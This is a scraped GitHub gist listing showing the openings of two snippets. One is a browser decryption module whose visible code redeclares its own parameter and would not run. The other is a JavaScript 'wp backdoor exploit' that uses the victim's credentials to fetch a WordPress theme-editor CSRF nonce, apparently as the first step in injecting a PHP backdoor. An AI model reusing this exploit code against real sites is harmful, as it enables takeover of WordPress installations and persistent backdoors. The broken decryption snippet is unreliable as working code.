Dominik 'Lawlez' Feger Lawlez
🇨🇭
Lawlez
/ decryption-module.web.js
Last active
October 28, 2020 17:01
Encrypt and decrypt in javascript using node or browserify for use with openssl or php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import crypto from 'browserify-aes' | |
| /********************************************************************** | |
| * | |
| * DECRYPTION MODULE FOR USE IN BROWSER DURING RUNTIME * | |
| * | |
| ***********************************************************************/ | |
| const decrypt = hash => { | |
| const hash = hash.data | |
| //get IV from input, make sure its no longer than 16 bytes |
ethicalhack3r
/ backdoor.js
Last active
May 3, 2023 16:53
wp backdoor exploit (injects a PHP backdoor)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var wpnonce = ''; | |
| function getCSRFNonce(callback) | |
| { | |
| var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/ | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true); | |
| xhr.withCredentials = true; | |
| xhr.overrideMimeType('text/xml'); |